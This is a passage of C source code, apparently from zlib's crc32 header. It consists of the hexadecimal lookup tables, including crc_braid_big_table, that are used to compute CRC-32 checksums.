0xa227e126, 0x94d571d5, 0xa1260167, 0x97d49194, 0xccc32081, 0xfa31b072, 0x7aec42ab, 0x4c1ed258, 0x1709634d, 0x21fbf3be, 0xcdc380be, 0xfb31104d, 0xa026a158, 0x96d431ab, 0x1609c372, 0x20fb5381, 0x7bece294, 0x4d1e7267, 0x100a03f0, 0x26f89303, 0x7def2216, 0x4b1db2e5, 0xcbc0403c, 0xfd32d0cf, 0xa62561da, 0x90d7f129, 0x7cef8229, 0x4a1d12da, 0x110aa3cf, 0x27f8333c, 0xa725c1e5, 0x91d75116, 0xcac0e003, 0xfc3270f0, 0xc9c10042, 0xff3390b1, 0xa42421a4, 0x92d6b157, 0x120b438e, 0x24f9d37d, 0x7fee6268, 0x491cf29b, 0xa524819b, 0x93d61168, 0xc8c1a07d, 0xfe33308e, 0x7eeec257, 0x481c52a4, 0x130be3b1, 0x25f97342, 0xa923009f, 0x9fd1906c, 0xc4c62179, 0xf234b18a, 0x72e94353, 0x441bd3a0, 0x1f0c62b5, 0x29fef246, 0xc5c68146, 0xf33411b5, 0xa823a0a0, 0x9ed13053, 0x1e0cc28a, 0x28fe5279, 0x73e9e36c, 0x451b739f, 0x70e8032d, 0x461a93de, 0x1d0d22cb, 0x2bffb238, 0xab2240e1, 0x9dd0d012, 0xc6c76107, 0xf035f1f4, 0x1c0d82f4, 0x2aff1207, 0x71e8a312, 0x471a33e1, 0xc7c7c138, 0xf13551cb, 0xaa22e0de, 0x9cd0702d, 0xc1c401ba, 0xf7369149, 0xac21205c, 0x9ad3b0af, 0x1a0e4276, 0x2cfcd285, 0x77eb6390, 0x4119f363, 0xad218063, 0x9bd31090, 0xc0c4a185, 0xf6363176, 0x76ebc3af, 0x4019535c, 0x1b0ee249, 0x2dfc72ba, 0x180f0208, 0x2efd92fb, 0x75ea23ee, 0x4318b31d, 0xc3c541c4, 0xf537d137, 0xae206022, 0x98d2f0d1, 0x74ea83d1, 0x42181322, 0x190fa237, 0x2ffd32c4, 0xaf20c01d, 0x99d250ee, 0xc2c5e1fb, 0xf4377108}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0xf390f23600000000, 0xe621e56d00000000, 0x15b1175b00000000, 0xcc43cadb00000000, 0x3fd338ed00000000, 0x2a622fb600000000, 0xd9f2dd8000000000, 0xd981e56c00000000, 0x2a11175a00000000, 0x3fa0000100000000, 0xcc30f23700000000, 0x15c22fb700000000, 0xe652dd8100000000, 0xf3e3cada00000000, 0x007338ec00000000, 0xb203cbd900000000, 0x419339ef00000000, 0x54222eb400000000, 0xa7b2dc8200000000, 0x7e40010200000000, 0x8dd0f33400000000, 0x9861e46f00000000, 0x6bf1165900000000, 0x6b822eb500000000, 0x9812dc8300000000, 0x8da3cbd800000000, 0x7e3339ee00000000, 
0xa7c1e46e00000000, 0x5451165800000000, 0x41e0010300000000, 0xb270f33500000000, 0x2501e76800000000, 0xd691155e00000000, 0xc320020500000000, 0x30b0f03300000000, 0xe9422db300000000, 0x1ad2df8500000000, 0x0f63c8de00000000, 0xfcf33ae800000000, 0xfc80020400000000, 0x0f10f03200000000, 0x1aa1e76900000000, 0xe931155f00000000, 0x30c3c8df00000000, 0xc3533ae900000000, 0xd6e22db200000000, 0x2572df8400000000, 0x97022cb100000000, 0x6492de8700000000, 0x7123c9dc00000000, 0x82b33bea00000000, 0x5b41e66a00000000, 0xa8d1145c00000000, 0xbd60030700000000, 0x4ef0f13100000000, 0x4e83c9dd00000000, 0xbd133beb00000000, 0xa8a22cb000000000, 0x5b32de8600000000, 0x82c0030600000000, 0x7150f13000000000, 0x64e1e66b00000000, 0x9771145d00000000, 0x4a02ced100000000, 0xb9923ce700000000, 0xac232bbc00000000, 0x5fb3d98a00000000, 0x8641040a00000000, 0x75d1f63c00000000, 0x6060e16700000000, 0x93f0135100000000, 0x93832bbd00000000, 0x6013d98b00000000, 0x75a2ced000000000, 0x86323ce600000000, 0x5fc0e16600000000, 0xac50135000000000, 0xb9e1040b00000000, 0x4a71f63d00000000, 0xf801050800000000, 0x0b91f73e00000000, 0x1e20e06500000000, 0xedb0125300000000, 0x3442cfd300000000, 0xc7d23de500000000, 0xd2632abe00000000, 0x21f3d88800000000, 0x2180e06400000000, 0xd210125200000000, 0xc7a1050900000000, 0x3431f73f00000000, 0xedc32abf00000000, 0x1e53d88900000000, 0x0be2cfd200000000, 0xf8723de400000000, 0x6f0329b900000000, 0x9c93db8f00000000, 0x8922ccd400000000, 0x7ab23ee200000000, 0xa340e36200000000, 0x50d0115400000000, 0x4561060f00000000, 0xb6f1f43900000000, 0xb682ccd500000000, 0x45123ee300000000, 0x50a329b800000000, 0xa333db8e00000000, 0x7ac1060e00000000, 0x8951f43800000000, 0x9ce0e36300000000, 0x6f70115500000000, 0xdd00e26000000000, 0x2e90105600000000, 0x3b21070d00000000, 0xc8b1f53b00000000, 0x114328bb00000000, 0xe2d3da8d00000000, 0xf762cdd600000000, 0x04f23fe000000000, 0x0481070c00000000, 0xf711f53a00000000, 0xe2a0e26100000000, 0x1130105700000000, 0xc8c2cdd700000000, 0x3b523fe100000000, 0x2ee328ba00000000, 0xdd73da8c00000000, 
0xd502ed7800000000, 0x26921f4e00000000, 0x3323081500000000, 0xc0b3fa2300000000, 0x194127a300000000, 0xead1d59500000000, 0xff60c2ce00000000, 0x0cf030f800000000, 0x0c83081400000000, 0xff13fa2200000000, 0xeaa2ed7900000000, 0x19321f4f00000000, 0xc0c0c2cf00000000, 0x335030f900000000, 0x26e127a200000000, 0xd571d59400000000, 0x670126a100000000, 0x9491d49700000000, 0x8120c3cc00000000, 0x72b031fa00000000, 0xab42ec7a00000000, 0x58d21e4c00000000, 0x4d63091700000000, 0xbef3fb2100000000, 0xbe80c3cd00000000, 0x4d1031fb00000000, 0x58a126a000000000, 0xab31d49600000000, 0x72c3091600000000, 0x8153fb2000000000, 0x94e2ec7b00000000, 0x67721e4d00000000, 0xf0030a1000000000, 0x0393f82600000000, 0x1622ef7d00000000, 0xe5b21d4b00000000, 0x3c40c0cb00000000, 0xcfd032fd00000000, 0xda6125a600000000, 0x29f1d79000000000, 0x2982ef7c00000000, 0xda121d4a00000000, 0xcfa30a1100000000, 0x3c33f82700000000, 0xe5c125a700000000, 0x1651d79100000000, 0x03e0c0ca00000000, 0xf07032fc00000000, 0x4200c1c900000000, 0xb19033ff00000000, 0xa42124a400000000, 0x57b1d69200000000, 0x8e430b1200000000, 0x7dd3f92400000000, 0x6862ee7f00000000, 0x9bf21c4900000000, 0x9b8124a500000000, 0x6811d69300000000, 0x7da0c1c800000000, 0x8e3033fe00000000, 0x57c2ee7e00000000, 0xa4521c4800000000, 0xb1e30b1300000000, 0x4273f92500000000, 0x9f0023a900000000, 0x6c90d19f00000000, 0x7921c6c400000000, 0x8ab134f200000000, 0x5343e97200000000, 0xa0d31b4400000000, 0xb5620c1f00000000, 0x46f2fe2900000000, 0x4681c6c500000000, 0xb51134f300000000, 0xa0a023a800000000, 0x5330d19e00000000, 0x8ac20c1e00000000, 0x7952fe2800000000, 0x6ce3e97300000000, 0x9f731b4500000000, 0x2d03e87000000000, 0xde931a4600000000, 0xcb220d1d00000000, 0x38b2ff2b00000000, 0xe14022ab00000000, 0x12d0d09d00000000, 0x0761c7c600000000, 0xf4f135f000000000, 0xf4820d1c00000000, 0x0712ff2a00000000, 0x12a3e87100000000, 0xe1331a4700000000, 0x38c1c7c700000000, 0xcb5135f100000000, 0xdee022aa00000000, 0x2d70d09c00000000, 0xba01c4c100000000, 0x499136f700000000, 0x5c2021ac00000000, 0xafb0d39a00000000, 
0x76420e1a00000000, 0x85d2fc2c00000000, 0x9063eb7700000000, 0x63f3194100000000, 0x638021ad00000000, 0x9010d39b00000000, 0x85a1c4c000000000, 0x763136f600000000, 0xafc3eb7600000000, 0x5c53194000000000, 0x49e20e1b00000000, 0xba72fc2d00000000, 0x08020f1800000000, 0xfb92fd2e00000000, 0xee23ea7500000000, 0x1db3184300000000, 0xc441c5c300000000, 0x37d137f500000000, 0x226020ae00000000, 0xd1f0d29800000000, 0xd183ea7400000000, 0x2213184200000000, 0x37a20f1900000000, 0xc432fd2f00000000, 0x1dc020af00000000, 0xee50d29900000000, 0xfbe1c5c200000000, 0x087137f400000000}, {0x0000000000000000, 0x3651822400000000, 0x6ca2044900000000, 0x5af3866d00000000, 0xd844099200000000, 0xee158bb600000000, 0xb4e60ddb00000000, 0x82b78fff00000000, 0xf18f63ff00000000, 0xc7dee1db00000000, 0x9d2d67b600000000, 0xab7ce59200000000, 0x29cb6a6d00000000, 0x1f9ae84900000000, 0x45696e2400000000, 0x7338ec0000000000, 0xa319b62500000000, 0x9548340100000000, 0xcfbbb26c00000000, 0xf9ea304800000000, 0x7b5dbfb700000000, 0x4d0c3d9300000000, 0x17ffbbfe00000000, 0x21ae39da00000000, 0x5296d5da00000000, 0x64c757fe00000000, 0x3e34d19300000000, 0x086553b700000000, 0x8ad2dc4800000000, 0xbc835e6c00000000, 0xe670d80100000000, 0xd0215a2500000000, 0x46336c4b00000000, 0x7062ee6f00000000, 0x2a91680200000000, 0x1cc0ea2600000000, 0x9e7765d900000000, 0xa826e7fd00000000, 0xf2d5619000000000, 0xc484e3b400000000, 0xb7bc0fb400000000, 0x81ed8d9000000000, 0xdb1e0bfd00000000, 0xed4f89d900000000, 0x6ff8062600000000, 0x59a9840200000000, 0x035a026f00000000, 0x350b804b00000000, 0xe52ada6e00000000, 0xd37b584a00000000, 0x8988de2700000000, 0xbfd95c0300000000, 0x3d6ed3fc00000000, 0x0b3f51d800000000, 0x51ccd7b500000000, 0x679d559100000000, 0x14a5b99100000000, 0x22f43bb500000000, 0x7807bdd800000000, 0x4e563ffc00000000, 0xcce1b00300000000, 0xfab0322700000000, 0xa043b44a00000000, 0x9612366e00000000, 0x8c66d89600000000, 0xba375ab200000000, 0xe0c4dcdf00000000, 0xd6955efb00000000, 0x5422d10400000000, 0x6273532000000000, 0x3880d54d00000000, 
0x0ed1576900000000, 0x7de9bb6900000000, 0x4bb8394d00000000, 0x114bbf2000000000, 0x271a3d0400000000, 0xa5adb2fb00000000, 0x93fc30df00000000, 0xc90fb6b200000000, 0xff5e349600000000, 0x2f7f6eb300000000, 0x192eec9700000000, 0x43dd6afa00000000, 0x758ce8de00000000, 0xf73b672100000000, 0xc16ae50500000000, 0x9b99636800000000, 0xadc8e14c00000000, 0xdef00d4c00000000, 0xe8a18f6800000000, 0xb252090500000000, 0x84038b2100000000, 0x06b404de00000000, 0x30e586fa00000000, 0x6a16009700000000, 0x5c4782b300000000, 0xca55b4dd00000000, 0xfc0436f900000000, 0xa6f7b09400000000, 0x90a632b000000000, 0x1211bd4f00000000, 0x24403f6b00000000, 0x7eb3b90600000000, 0x48e23b2200000000, 0x3bdad72200000000, 0x0d8b550600000000, 0x5778d36b00000000, 0x6129514f00000000, 0xe39edeb000000000, 0xd5cf5c9400000000, 0x8f3cdaf900000000, 0xb96d58dd00000000, 0x694c02f800000000, 0x5f1d80dc00000000, 0x05ee06b100000000, 0x33bf849500000000, 0xb1080b6a00000000, 0x8759894e00000000, 0xddaa0f2300000000, 0xebfb8d0700000000, 0x98c3610700000000, 0xae92e32300000000, 0xf461654e00000000, 0xc230e76a00000000, 0x4087689500000000, 0x76d6eab100000000, 0x2c256cdc00000000, 0x1a74eef800000000, 0x59cbc1f600000000, 0x6f9a43d200000000, 0x3569c5bf00000000, 0x0338479b00000000, 0x818fc86400000000, 0xb7de4a4000000000, 0xed2dcc2d00000000, 0xdb7c4e0900000000, 0xa844a20900000000, 0x9e15202d00000000, 0xc4e6a64000000000, 0xf2b7246400000000, 0x7000ab9b00000000, 0x465129bf00000000, 0x1ca2afd200000000, 0x2af32df600000000, 0xfad277d300000000, 0xcc83f5f700000000, 0x9670739a00000000, 0xa021f1be00000000, 0x22967e4100000000, 0x14c7fc6500000000, 0x4e347a0800000000, 0x7865f82c00000000, 0x0b5d142c00000000, 0x3d0c960800000000, 0x67ff106500000000, 0x51ae924100000000, 0xd3191dbe00000000, 0xe5489f9a00000000, 0xbfbb19f700000000, 0x89ea9bd300000000, 0x1ff8adbd00000000, 0x29a92f9900000000, 0x735aa9f400000000, 0x450b2bd000000000, 0xc7bca42f00000000, 0xf1ed260b00000000, 0xab1ea06600000000, 0x9d4f224200000000, 0xee77ce4200000000, 0xd8264c6600000000, 0x82d5ca0b00000000, 
0xb484482f00000000, 0x3633c7d000000000, 0x006245f400000000, 0x5a91c39900000000, 0x6cc041bd00000000, 0xbce11b9800000000, 0x8ab099bc00000000, 0xd0431fd100000000, 0xe6129df500000000, 0x64a5120a00000000, 0x52f4902e00000000, 0x0807164300000000, 0x3e56946700000000, 0x4d6e786700000000, 0x7b3ffa4300000000, 0x21cc7c2e00000000, 0x179dfe0a00000000, 0x952a71f500000000, 0xa37bf3d100000000, 0xf98875bc00000000, 0xcfd9f79800000000, 0xd5ad196000000000, 0xe3fc9b4400000000, 0xb90f1d2900000000, 0x8f5e9f0d00000000, 0x0de910f200000000, 0x3bb892d600000000, 0x614b14bb00000000, 0x571a969f00000000, 0x24227a9f00000000, 0x1273f8bb00000000, 0x48807ed600000000, 0x7ed1fcf200000000, 0xfc66730d00000000, 0xca37f12900000000, 0x90c4774400000000, 0xa695f56000000000, 0x76b4af4500000000, 0x40e52d6100000000, 0x1a16ab0c00000000, 0x2c47292800000000, 0xaef0a6d700000000, 0x98a124f300000000, 0xc252a29e00000000, 0xf40320ba00000000, 0x873bccba00000000, 0xb16a4e9e00000000, 0xeb99c8f300000000, 0xddc84ad700000000, 0x5f7fc52800000000, 0x692e470c00000000, 0x33ddc16100000000, 0x058c434500000000, 0x939e752b00000000, 0xa5cff70f00000000, 0xff3c716200000000, 0xc96df34600000000, 0x4bda7cb900000000, 0x7d8bfe9d00000000, 0x277878f000000000, 0x1129fad400000000, 0x621116d400000000, 0x544094f000000000, 0x0eb3129d00000000, 0x38e290b900000000, 0xba551f4600000000, 0x8c049d6200000000, 0xd6f71b0f00000000, 0xe0a6992b00000000, 0x3087c30e00000000, 0x06d6412a00000000, 0x5c25c74700000000, 0x6a74456300000000, 0xe8c3ca9c00000000, 0xde9248b800000000, 0x8461ced500000000, 0xb2304cf100000000, 0xc108a0f100000000, 0xf75922d500000000, 0xadaaa4b800000000, 0x9bfb269c00000000, 0x194ca96300000000, 0x2f1d2b4700000000, 0x75eead2a00000000, 0x43bf2f0e00000000}, {0x0000000000000000, 0xc8179ecf00000000, 0xd1294d4400000000, 0x193ed38b00000000, 0xa2539a8800000000, 0x6a44044700000000, 0x737ad7cc00000000, 0xbb6d490300000000, 0x05a145ca00000000, 0xcdb6db0500000000, 0xd488088e00000000, 0x1c9f964100000000, 0xa7f2df4200000000, 0x6fe5418d00000000, 
0x76db920600000000, 0xbecc0cc900000000, 0x4b44fa4f00000000, 0x8353648000000000, 0x9a6db70b00000000, 0x527a29c400000000, 0xe91760c700000000, 0x2100fe0800000000, 0x383e2d8300000000, 0xf029b34c00000000, 0x4ee5bf8500000000, 0x86f2214a00000000, 0x9fccf2c100000000, 0x57db6c0e00000000, 0xecb6250d00000000, 0x24a1bbc200000000, 0x3d9f684900000000, 0xf588f68600000000, 0x9688f49f00000000, 0x5e9f6a5000000000, 0x47a1b9db00000000, 0x8fb6271400000000, 0x34db6e1700000000, 0xfcccf0d800000000, 0xe5f2235300000000, 0x2de5bd9c00000000, 0x9329b15500000000, 0x5b3e2f9a00000000, 0x4200fc1100000000, 0x8a1762de00000000, 0x317a2bdd00000000, 0xf96db51200000000, 0xe053669900000000, 0x2844f85600000000, 0xddcc0ed000000000, 0x15db901f00000000, 0x0ce5439400000000, 0xc4f2dd5b00000000, 0x7f9f945800000000, 0xb7880a9700000000, 0xaeb6d91c00000000, 0x66a147d300000000, 0xd86d4b1a00000000, 0x107ad5d500000000, 0x0944065e00000000, 0xc153989100000000, 0x7a3ed19200000000, 0xb2294f5d00000000, 0xab179cd600000000, 0x6300021900000000, 0x6d1798e400000000, 0xa500062b00000000, 0xbc3ed5a000000000, 0x74294b6f00000000, 0xcf44026c00000000, 0x07539ca300000000, 0x1e6d4f2800000000, 0xd67ad1e700000000, 0x68b6dd2e00000000, 0xa0a143e100000000, 0xb99f906a00000000, 0x71880ea500000000, 0xcae547a600000000, 0x02f2d96900000000, 0x1bcc0ae200000000, 0xd3db942d00000000, 0x265362ab00000000, 0xee44fc6400000000, 0xf77a2fef00000000, 0x3f6db12000000000, 0x8400f82300000000, 0x4c1766ec00000000, 0x5529b56700000000, 0x9d3e2ba800000000, 0x23f2276100000000, 0xebe5b9ae00000000, 0xf2db6a2500000000, 0x3accf4ea00000000, 0x81a1bde900000000, 0x49b6232600000000, 0x5088f0ad00000000, 0x989f6e6200000000, 0xfb9f6c7b00000000, 0x3388f2b400000000, 0x2ab6213f00000000, 0xe2a1bff000000000, 0x59ccf6f300000000, 0x91db683c00000000, 0x88e5bbb700000000, 0x40f2257800000000, 0xfe3e29b100000000, 0x3629b77e00000000, 0x2f1764f500000000, 0xe700fa3a00000000, 0x5c6db33900000000, 0x947a2df600000000, 0x8d44fe7d00000000, 0x455360b200000000, 0xb0db963400000000, 0x78cc08fb00000000, 
0x61f2db7000000000, 0xa9e545bf00000000, 0x12880cbc00000000, 0xda9f927300000000, 0xc3a141f800000000, 0x0bb6df3700000000, 0xb57ad3fe00000000, 0x7d6d4d3100000000, 0x64539eba00000000, 0xac44007500000000, 0x1729497600000000, 0xdf3ed7b900000000, 0xc600043200000000, 0x0e179afd00000000, 0x9b28411200000000, 0x533fdfdd00000000, 0x4a010c5600000000, 0x8216929900000000, 0x397bdb9a00000000, 0xf16c455500000000, 0xe85296de00000000, 0x2045081100000000, 0x9e8904d800000000, 0x569e9a1700000000, 0x4fa0499c00000000, 0x87b7d75300000000, 0x3cda9e5000000000, 0xf4cd009f00000000, 0xedf3d31400000000, 0x25e44ddb00000000, 0xd06cbb5d00000000, 0x187b259200000000, 0x0145f61900000000, 0xc95268d600000000, 0x723f21d500000000, 0xba28bf1a00000000, 0xa3166c9100000000, 0x6b01f25e00000000, 0xd5cdfe9700000000, 0x1dda605800000000, 0x04e4b3d300000000, 0xccf32d1c00000000, 0x779e641f00000000, 0xbf89fad000000000, 0xa6b7295b00000000, 0x6ea0b79400000000, 0x0da0b58d00000000, 0xc5b72b4200000000, 0xdc89f8c900000000, 0x149e660600000000, 0xaff32f0500000000, 0x67e4b1ca00000000, 0x7eda624100000000, 0xb6cdfc8e00000000, 0x0801f04700000000, 0xc0166e8800000000, 0xd928bd0300000000, 0x113f23cc00000000, 0xaa526acf00000000, 0x6245f40000000000, 0x7b7b278b00000000, 0xb36cb94400000000, 0x46e44fc200000000, 0x8ef3d10d00000000, 0x97cd028600000000, 0x5fda9c4900000000, 0xe4b7d54a00000000, 0x2ca04b8500000000, 0x359e980e00000000, 0xfd8906c100000000, 0x43450a0800000000, 0x8b5294c700000000, 0x926c474c00000000, 0x5a7bd98300000000, 0xe116908000000000, 0x29010e4f00000000, 0x303fddc400000000, 0xf828430b00000000, 0xf63fd9f600000000, 0x3e28473900000000, 0x271694b200000000, 0xef010a7d00000000, 0x546c437e00000000, 0x9c7bddb100000000, 0x85450e3a00000000, 0x4d5290f500000000, 0xf39e9c3c00000000, 0x3b8902f300000000, 0x22b7d17800000000, 0xeaa04fb700000000, 0x51cd06b400000000, 0x99da987b00000000, 0x80e44bf000000000, 0x48f3d53f00000000, 0xbd7b23b900000000, 0x756cbd7600000000, 0x6c526efd00000000, 0xa445f03200000000, 0x1f28b93100000000, 0xd73f27fe00000000, 
0xce01f47500000000, 0x06166aba00000000, 0xb8da667300000000, 0x70cdf8bc00000000, 0x69f32b3700000000, 0xa1e4b5f800000000, 0x1a89fcfb00000000, 0xd29e623400000000, 0xcba0b1bf00000000, 0x03b72f7000000000, 0x60b72d6900000000, 0xa8a0b3a600000000, 0xb19e602d00000000, 0x7989fee200000000, 0xc2e4b7e100000000, 0x0af3292e00000000, 0x13cdfaa500000000, 0xdbda646a00000000, 0x651668a300000000, 0xad01f66c00000000, 0xb43f25e700000000, 0x7c28bb2800000000, 0xc745f22b00000000, 0x0f526ce400000000, 0x166cbf6f00000000, 0xde7b21a000000000, 0x2bf3d72600000000, 0xe3e449e900000000, 0xfada9a6200000000, 0x32cd04ad00000000, 0x89a04dae00000000, 0x41b7d36100000000, 0x588900ea00000000, 0x909e9e2500000000, 0x2e5292ec00000000, 0xe6450c2300000000, 0xff7bdfa800000000, 0x376c416700000000, 0x8c01086400000000, 0x441696ab00000000, 0x5d28452000000000, 0x953fdbef00000000}, {0x0000000000000000, 0x95d4709500000000, 0x6baf90f100000000, 0xfe7be06400000000, 0x9758503800000000, 0x028c20ad00000000, 0xfcf7c0c900000000, 0x6923b05c00000000, 0x2eb1a07000000000, 0xbb65d0e500000000, 0x451e308100000000, 0xd0ca401400000000, 0xb9e9f04800000000, 0x2c3d80dd00000000, 0xd24660b900000000, 0x4792102c00000000, 0x5c6241e100000000, 0xc9b6317400000000, 0x37cdd11000000000, 0xa219a18500000000, 0xcb3a11d900000000, 0x5eee614c00000000, 0xa095812800000000, 0x3541f1bd00000000, 0x72d3e19100000000, 0xe707910400000000, 0x197c716000000000, 0x8ca801f500000000, 0xe58bb1a900000000, 0x705fc13c00000000, 0x8e24215800000000, 0x1bf051cd00000000, 0xf9c2f31900000000, 0x6c16838c00000000, 0x926d63e800000000, 0x07b9137d00000000, 0x6e9aa32100000000, 0xfb4ed3b400000000, 0x053533d000000000, 0x90e1434500000000, 0xd773536900000000, 0x42a723fc00000000, 0xbcdcc39800000000, 0x2908b30d00000000, 0x402b035100000000, 0xd5ff73c400000000, 0x2b8493a000000000, 0xbe50e33500000000, 0xa5a0b2f800000000, 0x3074c26d00000000, 0xce0f220900000000, 0x5bdb529c00000000, 0x32f8e2c000000000, 0xa72c925500000000, 0x5957723100000000, 0xcc8302a400000000, 0x8b11128800000000, 
0x1ec5621d00000000, 0xe0be827900000000, 0x756af2ec00000000, 0x1c4942b000000000, 0x899d322500000000, 0x77e6d24100000000, 0xe232a2d400000000, 0xf285e73300000000, 0x675197a600000000, 0x992a77c200000000, 0x0cfe075700000000, 0x65ddb70b00000000, 0xf009c79e00000000, 0x0e7227fa00000000, 0x9ba6576f00000000, 0xdc34474300000000, 0x49e037d600000000, 0xb79bd7b200000000, 0x224fa72700000000, 0x4b6c177b00000000, 0xdeb867ee00000000, 0x20c3878a00000000, 0xb517f71f00000000, 0xaee7a6d200000000, 0x3b33d64700000000, 0xc548362300000000, 0x509c46b600000000, 0x39bff6ea00000000, 0xac6b867f00000000, 0x5210661b00000000, 0xc7c4168e00000000, 0x805606a200000000, 0x1582763700000000, 0xebf9965300000000, 0x7e2de6c600000000, 0x170e569a00000000, 0x82da260f00000000, 0x7ca1c66b00000000, 0xe975b6fe00000000, 0x0b47142a00000000, 0x9e9364bf00000000, 0x60e884db00000000, 0xf53cf44e00000000, 0x9c1f441200000000, 0x09cb348700000000, 0xf7b0d4e300000000, 0x6264a47600000000, 0x25f6b45a00000000, 0xb022c4cf00000000, 0x4e5924ab00000000, 0xdb8d543e00000000, 0xb2aee46200000000, 0x277a94f700000000, 0xd901749300000000, 0x4cd5040600000000, 0x572555cb00000000, 0xc2f1255e00000000, 0x3c8ac53a00000000, 0xa95eb5af00000000, 0xc07d05f300000000, 0x55a9756600000000, 0xabd2950200000000, 0x3e06e59700000000, 0x7994f5bb00000000, 0xec40852e00000000, 0x123b654a00000000, 0x87ef15df00000000, 0xeecca58300000000, 0x7b18d51600000000, 0x8563357200000000, 0x10b745e700000000, 0xe40bcf6700000000, 0x71dfbff200000000, 0x8fa45f9600000000, 0x1a702f0300000000, 0x73539f5f00000000, 0xe687efca00000000, 0x18fc0fae00000000, 0x8d287f3b00000000, 0xcaba6f1700000000, 0x5f6e1f8200000000, 0xa115ffe600000000, 0x34c18f7300000000, 0x5de23f2f00000000, 0xc8364fba00000000, 0x364dafde00000000, 0xa399df4b00000000, 0xb8698e8600000000, 0x2dbdfe1300000000, 0xd3c61e7700000000, 0x46126ee200000000, 0x2f31debe00000000, 0xbae5ae2b00000000, 0x449e4e4f00000000, 0xd14a3eda00000000, 0x96d82ef600000000, 0x030c5e6300000000, 0xfd77be0700000000, 0x68a3ce9200000000, 0x01807ece00000000, 
0x94540e5b00000000, 0x6a2fee3f00000000, 0xfffb9eaa00000000, 0x1dc93c7e00000000, 0x881d4ceb00000000, 0x7666ac8f00000000, 0xe3b2dc1a00000000, 0x8a916c4600000000, 0x1f451cd300000000, 0xe13efcb700000000, 0x74ea8c2200000000, 0x33789c0e00000000, 0xa6acec9b00000000, 0x58d70cff00000000, 0xcd037c6a00000000, 0xa420cc3600000000, 0x31f4bca300000000, 0xcf8f5cc700000000, 0x5a5b2c5200000000, 0x41ab7d9f00000000, 0xd47f0d0a00000000, 0x2a04ed6e00000000, 0xbfd09dfb00000000, 0xd6f32da700000000, 0x43275d3200000000, 0xbd5cbd5600000000, 0x2888cdc300000000, 0x6f1addef00000000, 0xfacead7a00000000, 0x04b54d1e00000000, 0x91613d8b00000000, 0xf8428dd700000000, 0x6d96fd4200000000, 0x93ed1d2600000000, 0x06396db300000000, 0x168e285400000000, 0x835a58c100000000, 0x7d21b8a500000000, 0xe8f5c83000000000, 0x81d6786c00000000, 0x140208f900000000, 0xea79e89d00000000, 0x7fad980800000000, 0x383f882400000000, 0xadebf8b100000000, 0x539018d500000000, 0xc644684000000000, 0xaf67d81c00000000, 0x3ab3a88900000000, 0xc4c848ed00000000, 0x511c387800000000, 0x4aec69b500000000, 0xdf38192000000000, 0x2143f94400000000, 0xb49789d100000000, 0xddb4398d00000000, 0x4860491800000000, 0xb61ba97c00000000, 0x23cfd9e900000000, 0x645dc9c500000000, 0xf189b95000000000, 0x0ff2593400000000, 0x9a2629a100000000, 0xf30599fd00000000, 0x66d1e96800000000, 0x98aa090c00000000, 0x0d7e799900000000, 0xef4cdb4d00000000, 0x7a98abd800000000, 0x84e34bbc00000000, 0x11373b2900000000, 0x78148b7500000000, 0xedc0fbe000000000, 0x13bb1b8400000000, 0x866f6b1100000000, 0xc1fd7b3d00000000, 0x54290ba800000000, 0xaa52ebcc00000000, 0x3f869b5900000000, 0x56a52b0500000000, 0xc3715b9000000000, 0x3d0abbf400000000, 0xa8decb6100000000, 0xb32e9aac00000000, 0x26faea3900000000, 0xd8810a5d00000000, 0x4d557ac800000000, 0x2476ca9400000000, 0xb1a2ba0100000000, 0x4fd95a6500000000, 0xda0d2af000000000, 0x9d9f3adc00000000, 0x084b4a4900000000, 0xf630aa2d00000000, 0x63e4dab800000000, 0x0ac76ae400000000, 0x9f131a7100000000, 0x6168fa1500000000, 0xf4bc8a8000000000}, 
{0x0000000000000000, 0x1f17f08000000000, 0x7f2891da00000000, 0x603f615a00000000, 0xbf56536e00000000, 0xa041a3ee00000000, 0xc07ec2b400000000, 0xdf69323400000000, 0x7eada6dc00000000, 0x61ba565c00000000, 0x0185370600000000, 0x1e92c78600000000, 0xc1fbf5b200000000, 0xdeec053200000000, 0xbed3646800000000, 0xa1c494e800000000, 0xbd5c3c6200000000, 0xa24bcce200000000, 0xc274adb800000000, 0xdd635d3800000000, 0x020a6f0c00000000, 0x1d1d9f8c00000000, 0x7d22fed600000000, 0x62350e5600000000, 0xc3f19abe00000000, 0xdce66a3e00000000, 0xbcd90b6400000000, 0xa3cefbe400000000, 0x7ca7c9d000000000, 0x63b0395000000000, 0x038f580a00000000, 0x1c98a88a00000000, 0x7ab978c400000000, 0x65ae884400000000, 0x0591e91e00000000, 0x1a86199e00000000, 0xc5ef2baa00000000, 0xdaf8db2a00000000, 0xbac7ba7000000000, 0xa5d04af000000000, 0x0414de1800000000, 0x1b032e9800000000, 0x7b3c4fc200000000, 0x642bbf4200000000, 0xbb428d7600000000, 0xa4557df600000000, 0xc46a1cac00000000, 0xdb7dec2c00000000, 0xc7e544a600000000, 0xd8f2b42600000000, 0xb8cdd57c00000000, 0xa7da25fc00000000, 0x78b317c800000000, 0x67a4e74800000000, 0x079b861200000000, 0x188c769200000000, 0xb948e27a00000000, 0xa65f12fa00000000, 0xc66073a000000000, 0xd977832000000000, 0x061eb11400000000, 0x1909419400000000, 0x793620ce00000000, 0x6621d04e00000000, 0xb574805300000000, 0xaa6370d300000000, 0xca5c118900000000, 0xd54be10900000000, 0x0a22d33d00000000, 0x153523bd00000000, 0x750a42e700000000, 0x6a1db26700000000, 0xcbd9268f00000000, 0xd4ced60f00000000, 0xb4f1b75500000000, 0xabe647d500000000, 0x748f75e100000000, 0x6b98856100000000, 0x0ba7e43b00000000, 0x14b014bb00000000, 0x0828bc3100000000, 0x173f4cb100000000, 0x77002deb00000000, 0x6817dd6b00000000, 0xb77eef5f00000000, 0xa8691fdf00000000, 0xc8567e8500000000, 0xd7418e0500000000, 0x76851aed00000000, 0x6992ea6d00000000, 0x09ad8b3700000000, 0x16ba7bb700000000, 0xc9d3498300000000, 0xd6c4b90300000000, 0xb6fbd85900000000, 0xa9ec28d900000000, 0xcfcdf89700000000, 0xd0da081700000000, 0xb0e5694d00000000, 
